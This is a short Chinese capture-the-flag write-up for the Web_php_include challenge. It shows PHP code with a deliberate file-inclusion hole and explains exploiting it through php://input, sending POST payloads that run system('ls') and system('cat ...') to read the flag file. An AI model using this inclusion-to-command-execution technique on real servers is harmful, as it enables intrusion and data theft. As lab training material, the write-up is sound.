Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
heartbeat..2 小时前
JavaWeb 入门 - HttpServletResponse 响应对象 详解
java·网络·http·web·response
曲幽6 小时前
从安装到上线:一份 Nginx 实战指南,让你的 Web 应用稳建安全
python·nginx·flask·fastapi·web·gunicorn·uvicorn
源代码•宸9 小时前
goframe框架签到系统项目开发(实现总积分和积分明细接口、补签日期校验)
后端·golang·postman·web·dao·goframe·补签
沛沛老爹10 小时前
Web开发者快速上手AI Agent:基于Function Calling的提示词应用优化实战
java·人工智能·llm·agent·web·企业开发·function
杰瑞哥哥10 小时前
快速搭建Web前端(streamlit使用指南)
python·信息可视化·web·模型部署
给勒布朗上上对抗呀12 小时前
FlaskSession伪造-攻防世界-catcat-new
flask·ctf
蓝之白1 天前
Web14-game1
web安全·ctf
ShoreKiten2 天前
ctfshow-web177
sql·web
print_Hyon2 天前
【CTF-WEB】原型链污染及Pug模板注入
ctf
print_Hyon2 天前
【CTF-APK】基于TRAE和jadx的MCP实现AI逆向分析APK文件
ctf